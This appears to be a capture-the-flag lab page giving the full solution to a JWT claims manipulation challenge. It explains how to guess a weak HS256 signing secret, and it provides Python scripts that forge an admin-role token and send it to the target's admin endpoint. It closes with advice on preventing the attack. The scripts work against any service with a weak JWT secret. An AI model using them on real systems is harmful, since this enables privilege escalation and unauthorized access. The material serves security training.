Avatar

Labs / JWT Claims Manipulation

  • Daily Challenge
  • Released 31 Jul 2025

JWT Claims Manipulation

Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!

1
Flags
1
Points
Daily Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Daily Challenge

JWT Claims Manipulation - Complete Solution

Understanding the Challenge

This challenge requires manipulating JWT claims while respecting strict time constraints. You must create a valid JWT with admin privileges where the token validity window (exp - iat) does not exceed 10 seconds, and the token must be valid at the current time.

Step 1: Access Challenge and Get Initial Token

  1. Open the challenge: Navigate to <target-ip>
  2. Get a user token: Click "Get JWT Token" to obtain a basic user-level JWT
  3. Analyze the token: Click "Analyze Token" to see the current token structure
Token Structure Analysis:
Header: {"alg": "HS256", "typ": "JWT"}
Payload: {"sub": "user123", "role": "user", "iat": [timestamp], "exp": [timestamp + 3600]}
Problem: Role is "user" (need "admin") and validity window is 3600 seconds (need ≤ 10 seconds)

Step 2: Discover the JWT Secret Key

For this daily challenge, the JWT secret is intentionally weak for educational purposes. Try common weak secrets:

  1. Common passwords: Try "secret", "password", "key", "123456"
  2. Quick test: The secret is "secret" (very common in CTF challenges)
  3. Verification: You can verify this works by successfully signing a JWT
Pro Tip: In real-world scenarios, use tools like hashcat with wordlists, or try dictionary attacks against weak JWT secrets.

Step 3: Install Required Tools

You'll need Python with the PyJWT library to manipulate JWT tokens:

# Install PyJWT library
pip install PyJWT

# Verify installation
python -c "import jwt; print('JWT library ready')"

Step 4: Create the Attack Script

Create a Python script to generate a valid admin JWT with proper time constraints:

#!/usr/bin/env python3
import jwt
import time

# JWT secret (discovered from weak password testing)
secret = "secret"

# Get current timestamp for precise timing
current_time = int(time.time())

# Create admin payload with 10-second validity window
payload = {
    "sub": "user123",           # Keep original subject
    "role": "admin",           # CHANGE: user → admin
    "iat": current_time,        # CHANGE: issued now
    "exp": current_time + 10    # CHANGE: expires in 10 seconds
}

# Generate properly signed JWT
admin_jwt = jwt.encode(payload, secret, algorithm="HS256")

print(f"Generated Admin JWT:")
print(admin_jwt)
print(f"\nToken valid from {current_time} to {current_time + 10}")
print(f"Current time: {int(time.time())}")
print(f"\nQuickly paste this token into the challenge!")

Step 5: Execute the Attack (Time-Critical)

  1. Run the script: Execute your Python script to generate the admin JWT
  2. Copy immediately: Copy the generated JWT token
  3. Paste quickly: Go back to the challenge page and paste the token in the test field
  4. Test admin access: Click "Test Admin Access" button within 10 seconds
Timing is Critical: You have only 10 seconds from when the token is generated until it expires. Work quickly and have the challenge page ready!

Step 6: Success Verification

If the attack is successful, you'll see:

SUCCESS! Admin access granted!
Challenge completed successfully.
🎉 FLAG: [UUID-DISPLAYED-HERE]

This message indicates you've successfully manipulated the JWT claims and bypassed the authentication system!

Alternative: Automated Approach

For even faster execution, create an automated script that generates and tests the token:

#!/usr/bin/env python3
import jwt
import time
import requests

secret = "secret"
target_url = "http://<target-ip>"

current_time = int(time.time())
payload = {
    "sub": "user123",
    "role": "admin",
    "iat": current_time,
    "exp": current_time + 10
}

admin_jwt = jwt.encode(payload, secret, algorithm="HS256")

# Immediately test the token
response = requests.get(f"{target_url}/admin", 
                       headers={"Authorization": f"Bearer {admin_jwt}"})

if response.status_code == 200:
    print("SUCCESS! Admin access granted!")
    print(response.json())
else:
    print(f"Failed: {response.json()}")

Understanding What We Exploited

  • Weak Secret: The JWT was signed with a simple, guessable secret
  • Claims Manipulation: We changed the role claim from "user" to "admin"
  • Time Constraint Bypass: We crafted a token with exactly 10 seconds validity
  • Valid Signature: Our knowledge of the secret allowed us to create a properly signed token
  • Privilege Escalation: We gained admin access without proper authorization

Real-World Prevention

  • Strong Secrets: Use cryptographically secure, random secrets (minimum 256 bits)
  • Secret Management: Store secrets securely and rotate them regularly
  • Server-Side Validation: Always validate all claims server-side, never trust client data
  • Asymmetric Signing: Consider using RS256 with public/private key pairs
  • Short Expiration: Use short token lifetimes and refresh mechanisms
  • Monitoring: Log and monitor for unusual JWT patterns and failed validations

Challenge Summary

This challenge demonstrates how weak JWT secrets combined with claims manipulation can lead to privilege escalation. The time constraint adds realism, simulating scenarios where tokens have short validity periods. Understanding these vulnerabilities helps developers implement more secure JWT-based authentication systems.